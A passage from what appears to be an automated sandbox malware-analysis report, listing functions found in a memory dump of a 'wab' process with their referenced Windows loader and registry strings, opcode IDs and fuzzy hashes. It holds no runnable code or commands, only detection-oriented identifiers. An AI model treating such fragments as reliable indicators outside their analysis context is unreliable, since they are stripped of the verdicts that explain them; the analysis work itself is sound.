                                                            • Instruction Fuzzy Hash: B7819C79608340AFE311DB15C944BAABBF8EF85750F28092DF9909B390E774E984CF56
                                                            Function 0365909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %$&$@
                                                            • API String ID: 0-1537733988
                                                            • Opcode ID: 5b8892b8980c7c2092926bf73a0d2b9be3fcb3a1b3583525f6c26fd56ef144c3
                                                            • Instruction ID: b379b216ca062024b67ba2d10d09fa195a76d0ee7d6fb0d54aa67445b505c265
                                                            • Opcode Fuzzy Hash: 5b8892b8980c7c2092926bf73a0d2b9be3fcb3a1b3583525f6c26fd56ef144c3
                                                            • Instruction Fuzzy Hash: C6719174508301DFDB14DF14C680A2BBBE9BF85718F14892EF99A9B350C731D90ACB9A
                                                            Function 036FB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • TargetNtPath, xrefs: 036FB82F
                                                            • GlobalizationUserSettings, xrefs: 036FB834
                                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 036FB82A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                            • API String ID: 0-505981995
                                                            • Opcode ID: c108317385e981a86f86e26fae11320672c448f2f037dd012e713e91e8ec4eeb
                                                            • Instruction ID: 8ae5f21a8f3e397e7c186c6ace592753fd763673865f3ff46d9be5bbde823935
                                                            • Opcode Fuzzy Hash: c108317385e981a86f86e26fae11320672c448f2f037dd012e713e91e8ec4eeb
                                                            • Instruction Fuzzy Hash: 82618076941229AFDB21DF54DC88BDAB7B8AF09710F0101E9EA09AB350D774DE84CF94
                                                            Function 0361F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • HEAP: , xrefs: 0367E6B3
                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0367E6C6
                                                            • HEAP[%wZ]: , xrefs: 0367E6A6
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                            • API String ID: 0-1340214556
                                                            • Opcode ID: ad53562ee08dd3f78a3db451728eea58f58f5ee878d50cbe7d9d148c5896f441
                                                            • Instruction ID: c786088da47ac8a8f4e67dec6945cab495833232ade4dccc430c89240a6b82a2
                                                            • Opcode Fuzzy Hash: ad53562ee08dd3f78a3db451728eea58f58f5ee878d50cbe7d9d148c5896f441
                                                            • Instruction Fuzzy Hash: B151F535600B84EFE722DBA8C944BAABBF8FF05300F0845A4E5418F792D775E965CB20
                                                            Function 0365C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 036982DE
                                                            • Failed to reallocate the system dirs string !, xrefs: 036982D7
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 036982E8
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1783798831
                                                            • Opcode ID: c7c2b40da1617ad84d8a5fe964a6228f76486997fed1bae36ea4c548681002e2
                                                            • Instruction ID: b3746a5a31cf2c1f198b40c1b75845934446199ec40eeb6d1a6737e2af186179
                                                            • Opcode Fuzzy Hash: c7c2b40da1617ad84d8a5fe964a6228f76486997fed1bae36ea4c548681002e2
                                                            • Instruction Fuzzy Hash: 1041C0B6554300ABD720FB68D944B5BB7E8EF4AA50F04893EBD48DB290E774D8018B95
                                                            Function 036DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 036DC1C5
                                                            • @, xrefs: 036DC1F1
                                                            • PreferredUILanguages, xrefs: 036DC212
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                            • API String ID: 0-2968386058
                                                            • Opcode ID: d0171947548f017e43c7af4356b535e2ea5d095647f454301cb6888361f935d2
                                                            • Instruction ID: 0b7ff669fd79b63501a10231a0032f5d3859e0278f0961d4bc55fbc2c37c0683
                                                            • Opcode Fuzzy Hash: d0171947548f017e43c7af4356b535e2ea5d095647f454301cb6888361f935d2
                                                            • Instruction Fuzzy Hash: 66417D76E0020DABDB11DAD4C991BEEF7BDAB04700F14416AEA05B72A0D7749A44CB98
                                                            Function 036B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                            • API String ID: 0-1373925480
                                                            • Opcode ID: 10c099c8fbb2a7b4b50b47adacaeb7a5fecffe2f486888915c84a0120e3694c9
                                                            • Instruction ID: c5d20fb85ff3ce0ecefa2dcd0f49d06d4b88951b6f0d1301c52bc7e05018edae
                                                            • Opcode Fuzzy Hash: 10c099c8fbb2a7b4b50b47adacaeb7a5fecffe2f486888915c84a0120e3694c9
                                                            • Instruction Fuzzy Hash: C94113359007588BEB22DB96CA40BFDBBB8EF46340F280469D841EF382DB359981CF15
                                                            Function 036A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 036A4888
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 036A4899
                                                            • LdrpCheckRedirection, xrefs: 036A488F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-3154609507
                                                            • Opcode ID: 8b605a067d81fc18906bab6ddaac451c45d411b011814f4d1638a85e29a26812
                                                            • Instruction ID: cb2c31af6bccdaf4a494c3a69fce9c11a114a1a25fe32226222bf941cdcd287e
                                                            • Opcode Fuzzy Hash: 8b605a067d81fc18906bab6ddaac451c45d411b011814f4d1638a85e29a26812
                                                            • Instruction Fuzzy Hash: C541C636600B909FCB22CE5EED44A26B7E9FF49A50B09056DEC5597351DBB0DC01CF91
                                                            Function 036533A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Actx , xrefs: 036533AC
                                                            • SXS: %s() passed the empty activation context data, xrefs: 036929FE
                                                            • RtlCreateActivationContext, xrefs: 036929F9
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                            • API String ID: 0-859632880
                                                            • Opcode ID: afb5cd439bf74b5da318739f5ff0063afe034cd6f978970f0ae48bc1047eab4d
                                                            • Instruction ID: 3bc4cb8965fcccf8b6e3f3d9b6e8be6cf7661d22fe7e755782c3c1aa62653ffb
                                                            • Opcode Fuzzy Hash: afb5cd439bf74b5da318739f5ff0063afe034cd6f978970f0ae48bc1047eab4d
                                                            • Instruction Fuzzy Hash: 35312537200305AFEF16DE59C990B96B7A8AB44B61F19847AFD059F381C770D842CBA0
                                                            Function 03651607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • DLL "%wZ" has TLS information at %p, xrefs: 03691A40
                                                            • minkernel\ntdll\ldrtls.c, xrefs: 03691A51
                                                            • LdrpInitializeTls, xrefs: 03691A47
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                            • API String ID: 0-931879808
                                                            • Opcode ID: e952eb0b12626746f9806ae8a7ca5a67c17f76d70b8a6a693573cd1b61378cf6
                                                            • Instruction ID: 2886757c20ff4221c1965ba465444eeb52eede102876a6a0bbd472b7eb4296d4
                                                            • Opcode Fuzzy Hash: e952eb0b12626746f9806ae8a7ca5a67c17f76d70b8a6a693573cd1b61378cf6
                                                            • Instruction Fuzzy Hash: 65310432A00205ABEF18DF48C986F6A76BCEB87764F15407DF945BB280E7B4AD148794
                                                            Function 03661270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0366127B
                                                            • BuildLabEx, xrefs: 0366130F
                                                            • @, xrefs: 036612A5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                            • API String ID: 0-3051831665
                                                            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                            • Instruction ID: 3ab294e150aa96f7ea62a3aecc1e85e1720be406b1a721bffb51fb937c3b8696
                                                            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                            • Instruction Fuzzy Hash: 3731B176900218AFDB11EF95CC40EDEBBBDEB86790F004429E905AB260D730DE05CB94
                                                            Function 036A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Process initialization failed with status 0x%08lx, xrefs: 036A20F3
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 036A2104
                                                            • LdrpInitializationFailure, xrefs: 036A20FA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2986994758
                                                            • Opcode ID: f928391345aef560ad76803bd9cb3d6ff87f7c009fcb5c371bec475ba5719f09
                                                            • Instruction ID: 4e1e2b1b8605079f146d0b271e3d0629600b155bb36e692af3075266eb677524
                                                            • Opcode Fuzzy Hash: f928391345aef560ad76803bd9cb3d6ff87f7c009fcb5c371bec475ba5719f09
                                                            • Instruction Fuzzy Hash: F2F0283A6803086FE714EA4CDD97F9A7B6CEB41B54F04045DF7046B281D6F0AD40CA90
                                                            Function 036303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: #%u
                                                            • API String ID: 48624451-232158463
                                                            • Opcode ID: c0b12e4294f97359505e13b54a9438e6b9d6c320fa5566c638c4f162d6408a7d
                                                            • Instruction ID: 8d51a6cdf377ed1244b4c772896d6a6f824e1d8340cca2eedea6dc6e2101c677
                                                            • Opcode Fuzzy Hash: c0b12e4294f97359505e13b54a9438e6b9d6c320fa5566c638c4f162d6408a7d
                                                            • Instruction Fuzzy Hash: EC715C75A0020A9FCB01DFA9C990BAEB7F8EF09344F154169E901EB351EB34EE05CB64
                                                            Function 036352A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@
                                                            • API String ID: 0-149943524
                                                            • Opcode ID: a7d31b6d1bc82c382c3fa855e162bc719923eb08814ba20457735e19c9cd07d5
                                                            • Instruction ID: a1b920cea1808d38cc1dcf0ea540174934e2efb56d95a5fa1330128b80e8b7dc
                                                            • Opcode Fuzzy Hash: a7d31b6d1bc82c382c3fa855e162bc719923eb08814ba20457735e19c9cd07d5
                                                            • Instruction Fuzzy Hash: 9F328A745083518BC724DF19C684B3AF7E5EF8B744F184A1EEA869B3A0E734D851CB92
                                                            Function 036EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `$`
                                                            • API String ID: 0-197956300
                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction ID: 40c0edb1bfd2af663042cec1bef41b123cc4dd17dd87cea649f0d6408fb16016
                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                            • Instruction Fuzzy Hash: 08C1DF322053429BDB24CF68C945B2BFBE5EFC4718F088A2CF995CA290D775D909CB95
                                                            Function 0369E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: Legacy$UEFI
                                                            • API String ID: 2994545307-634100481
                                                            • Opcode ID: 9d55ccbf980b385d020294c3cc43a8e5ad9df8f16e7b39feb88b67e10501883a
                                                            • Instruction ID: 6e01aeca4b0b35cda30c43599b5935efb8d58addd8b69b05ba81b0b80efb5d16
                                                            • Opcode Fuzzy Hash: 9d55ccbf980b385d020294c3cc43a8e5ad9df8f16e7b39feb88b67e10501883a
                                                            • Instruction Fuzzy Hash: DB615C75E007189FEF14DFA8C940BAEBBB9FB48740F14406EE549EB291D732A941CB54
                                                            Function 0363F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$$
                                                            • API String ID: 0-233714265
                                                            • Opcode ID: c947b5b180fe494f9df0cb87daddd90185950ee3d1bb142026021d909e58bf2a
                                                            • Instruction ID: 27087f7702a065894db2ba2d0acef5878c1a30ff9c355eb52bddcd0eb705e6a2
                                                            • Opcode Fuzzy Hash: c947b5b180fe494f9df0cb87daddd90185950ee3d1bb142026021d909e58bf2a
                                                            • Instruction Fuzzy Hash: 1261B876E007499BDB24EFA8C684BA9BBB5FF46304F18406DD5196F780CB78A941CB84
                                                            Function 0362A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0362A2FB
                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0362A309
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                            • API String ID: 0-2876891731
                                                            • Opcode ID: 5bba37483b73dd201d1a94032e7d4ac9cf58ea85cf140f861d99147b98c943d2
                                                            • Instruction ID: e7e08d99f063e380bc040466aa5a56ab9c8b550913a142702b633eee1a3d6be9
                                                            • Opcode Fuzzy Hash: 5bba37483b73dd201d1a94032e7d4ac9cf58ea85cf140f861d99147b98c943d2
                                                            • Instruction Fuzzy Hash: 4741ED34A01A65CBCB11DF99C940F6ABBB4FF89704F2945A9EC00DB391EAB5C901CF45
                                                            Function 0365329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local\$@
                                                            • API String ID: 0-380025441
                                                            • Opcode ID: 52d867921b8e29fa6f7514d26d66f02b07832657d3a21f7da544cbc2d867405c
                                                            • Instruction ID: 29471b1e41e06af65107cc3569b4e2bc022f6b8a802332ed3be9cc73ffd9c540
                                                            • Opcode Fuzzy Hash: 52d867921b8e29fa6f7514d26d66f02b07832657d3a21f7da544cbc2d867405c
                                                            • Instruction Fuzzy Hash: A531A17A5083449FC311DF28C980A6BBBE8EB95A94F58093EF99587350DA34DD05CB92
                                                            Function 0362C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: MUI
                                                            • API String ID: 0-1339004836
                                                            • Opcode ID: 8712e141b64ceb01304357a9956dd35883de17e4f0d5167d4663a0f29447e207
                                                            • Instruction ID: b4f1fa51c872085d380425ae56257129384fcb1a83984c23f7faff7b2ffd4724
                                                            • Opcode Fuzzy Hash: 8712e141b64ceb01304357a9956dd35883de17e4f0d5167d4663a0f29447e207
                                                            • Instruction Fuzzy Hash: 00825F75E00A288FDB24CFA9C940BADFBB5BF49310F1A8169E859AB350D7709941CF54
                                                            Function 036CA118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 0eb3851fd7764ee03bf77798c33707347354173b003b2dee967f1cce18fcf1b3
                                                            • Instruction ID: cc2baf95a69710de3aee6e760c5b01e5b684a2a61553c7d658aa7364cc3a7f85
                                                            • Opcode Fuzzy Hash: 0eb3851fd7764ee03bf77798c33707347354173b003b2dee967f1cce18fcf1b3
                                                            • Instruction Fuzzy Hash: 0222AD746246E98BDB24CFA9C294372B7F1EF44300F08859ED8868F786D739D452DB64
                                                            Function 03627370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12ab17aa4a5cf2f99689a5f6a7a1d3b2c3c44b0322a51544cee6d6d10824a183
                                                            • Instruction ID: 11f053b73c58ff7a7212300a2e58572185bdaca4d03f7fdc976fdc0d2a479ee8
                                                            • Opcode Fuzzy Hash: 12ab17aa4a5cf2f99689a5f6a7a1d3b2c3c44b0322a51544cee6d6d10824a183
                                                            • Instruction Fuzzy Hash: 31A17BB5608B42CFC310DF28D580E2ABBE5BF89304F154A6DE5859B351EB30E945CF96
                                                            Function 0365F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 198df12cc6a7181828a49a460398fefd6db83e92e2840cf931556679a24df4e0
                                                            • Instruction ID: 37a9a755f6f23c2372ba354f7e754b19e2f3bdfcb926fa40a57657979a247e02
                                                            • Opcode Fuzzy Hash: 198df12cc6a7181828a49a460398fefd6db83e92e2840cf931556679a24df4e0
                                                            • Instruction Fuzzy Hash: 23415DB5D01288EFDB20DFA9C580AAEFBF4FB49340F14852EE859AB211D7709911DF60
                                                            Function 0365A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: GlobalTags
                                                            • API String ID: 0-1106856819
                                                            • Opcode ID: 1dc65bef19face0b577699825749adc13f2021c86154175598c41798418a4202
                                                            • Instruction ID: 6a85d2f1fc1b8da668f590273c647b5806e12b3468acc5c0e0801599507e61db
                                                            • Opcode Fuzzy Hash: 1dc65bef19face0b577699825749adc13f2021c86154175598c41798418a4202
                                                            • Instruction Fuzzy Hash: 89715175E0031ADFEF18CF98DA906ADBBB5BF48720F18816EE805AB340D7759941CB64
                                                            Function 0362973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                            • Instruction ID: 0f7201aba768113140b8c92827b4515f6ca85cde21cc335b873e1f9023566ddb
                                                            • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                            • Instruction Fuzzy Hash: 39619B75D00628ABDF21DFA5C940BAEBFF4FF84710F190A29E810A7290D7789A11CF60
                                                            Function 036AF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                            • Instruction ID: 5236e6f83261e25e7358dd18711bd598ee90f3844249145c44d9aad31737ffe4
                                                            • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                            • Instruction Fuzzy Hash: 76518A72608B05AFD721DF18CD40F6AB7E8FB85790F04092DBA809B290D7B4ED14CB96
                                                            Function 0363E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: EXT-
                                                            • API String ID: 0-1948896318
                                                            • Opcode ID: 86b1446caa0952f64ef55ea88af6925a40bb0e1e61fa9238d7a6c0395eea2822
                                                            • Instruction ID: 0817dbbbbc0662b04892fc9f5342c9aaa78f22ef4d32cf1bab1a15c78230c928
                                                            • Opcode Fuzzy Hash: 86b1446caa0952f64ef55ea88af6925a40bb0e1e61fa9238d7a6c0395eea2822
                                                            • Instruction Fuzzy Hash: E641A1765083159BD720DB74C944BAFB7E8EF8A714F04092DF584DB240E775D904C7AA
                                                            Function 036DB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PreferredUILanguages
                                                            • API String ID: 0-1884656846
                                                            • Opcode ID: e26bf660ca5369c392afeeeaf61c433d2a30478e0fa1b90b21a6d6deccb9b00a
                                                            • Instruction ID: 592c461aa3df3d1423e690bf5fe1e906af96b90462a9dac7133cbc1aed235e0e
                                                            • Opcode Fuzzy Hash: e26bf660ca5369c392afeeeaf61c433d2a30478e0fa1b90b21a6d6deccb9b00a
                                                            • Instruction Fuzzy Hash: 5941D136D00219ABCF11DA94C940BFEF7B9AF44750F0B016AE901EB758DAB0DE40D7A4
                                                            Function 0369C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryHash
                                                            • API String ID: 0-2202222882
                                                            • Opcode ID: cb62cbb01298ea91b0ddf79b0f302853e24cc74d4255cf3e760a261b18d21446
